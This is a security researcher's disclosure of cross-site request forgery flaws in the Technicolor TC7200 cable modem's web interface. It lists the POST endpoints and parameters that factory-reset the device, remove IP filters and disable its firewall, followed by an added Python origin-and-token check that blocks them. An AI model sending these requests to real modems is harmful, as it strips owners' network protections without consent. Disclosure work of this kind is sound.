Among other cable modems, UPC uses the Technicolor TC7200. The Technicolor TC7200 is a DOCSIS 3.0 dual band concurrent wireless Embedded Multimedia Terminal Adapter (EMTA).
After getting my hands on one of these modems I decided to test it for vulnerabilities in the web interface. As it turned out, the device had multiple vulnerabilities, one of which is Cross Site Request Forgery.
## Multiple Cross Site Request Forgery Vulnerabilities
It is possible to change the IP filtering options, change the firewall settings and factory reset the device. An attacker could also create an IP forwarding rule that enables remote access to the device.
A Cross Site Request Forgery attack is possible against any function within the web application, since the origin of the request is not checked anywhere. The video above shows only a few of the options that an attacker might be able to exploit. The following payloads are used in the video:
## Payload for Factory Reset:
POST : http://<ip>/goform/system/factory
## Payload to disable the advanced options:
POST : http://<ip>/goform/advanced/options
## Payload to remove ip-filters:
POST : http://<ip>/goform/advanced/ip-filters
Parameter: IpFilterAddressDelete1 = 1
## Payload to remove firewall settings:
POST : http://<ip>/goform/advanced/firewall
Parameter: cbFirewall = 1
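
The missing control is a check on where each state-changing request comes from. The following is an added example, not code from the original post or from the device firmware, showing a server-side check that would reject the cross-site requests listed above. The address `192.0.2.1` (standing in for `<ip>`), the `csrf_token` form field and the sample requests are constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Constructed address standing in for the page's <ip>; the device's own origin(s).
DEVICE_ORIGINS = {"http://192.0.2.1"}

def source_origin(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def allow_request(method, headers, form, session_token):
    """Decide whether a request may change device state."""
    if method.upper() in SAFE_METHODS:
        return True
    # Compare against a fixed allowlist, not the Host header the client sent.
    if source_origin(headers) not in DEVICE_ORIGINS:
        return False  # cross-site, or no origin information at all
    # Hypothetical hidden form field carrying the per-session token.
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied.encode(), session_token.encode())

def evaluate_samples():
    """Run the check over constructed requests to the firewall form."""
    token = secrets.token_urlsafe(32)  # issued when the admin logs in
    samples = {
        "own_form": ({"Origin": "http://192.0.2.1"},
                     {"cbFirewall": "1", "csrf_token": token}),
        "cross_site": ({"Origin": "http://other.example"},
                       {"cbFirewall": "1"}),
        "no_origin": ({}, {"cbFirewall": "1", "csrf_token": token}),
        "referer_only": ({"Referer": "http://192.0.2.1/"},
                         {"cbFirewall": "1", "csrf_token": token}),
        "right_origin_no_token": ({"Origin": "http://192.0.2.1"},
                                  {"cbFirewall": "1"}),
    }
    return {name: allow_request("POST", h, f, token)
            for name, (h, f) in samples.items()}

if __name__ == "__main__":
    for name, allowed in evaluate_samples().items():
        print(f"{name}: {'accept' if allowed else 'reject'}")
```

The check only helps if every setting change is made with POST; a handler that also acts on GET would bypass it through the safe-method branch.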